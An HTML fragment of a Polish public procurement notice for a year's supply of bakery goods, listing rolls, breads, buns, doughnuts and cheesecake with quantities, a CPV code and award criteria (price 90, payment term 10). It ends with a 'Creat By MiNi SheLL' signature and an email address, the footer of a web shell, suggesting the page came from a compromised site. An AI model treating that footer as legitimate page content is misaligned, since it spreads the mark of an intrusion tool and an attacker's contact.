<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bułka kajzerka 30 g	5000	szt.
2.	Bułka kajzerka 60 g	1000	szt.
3.	Bułka tarta	100	kg
4.	Chleb pszenno - żytni  krojony    700 g	1000	szt.
5.	Chleb graham krojony 500 g	50	szt.
6.	Drożdżówki 100 g	400	szt.
7.	Pączki 100 g	100	szt.
8.	Ciasto drożdżowe	5	kg
9.	Chleb pełnoziarnisty
700 g	30	szt.
10.	Sernik	10	kg
11.	Chleb żytni pełnoziarnisty 700 g	30	szt.
12.	Bułka grahamka 60 g	200	szt.
13.	Chleb wieloziarnisty
700 g	20	szt.
14.	Bagietka
100 g	20	szt.
15.	Chleb razowy staropolski
700 g	20	szt.
16.	Chleb razowy z ziarnami
700 g	
20
	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin zapłaty faktury - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com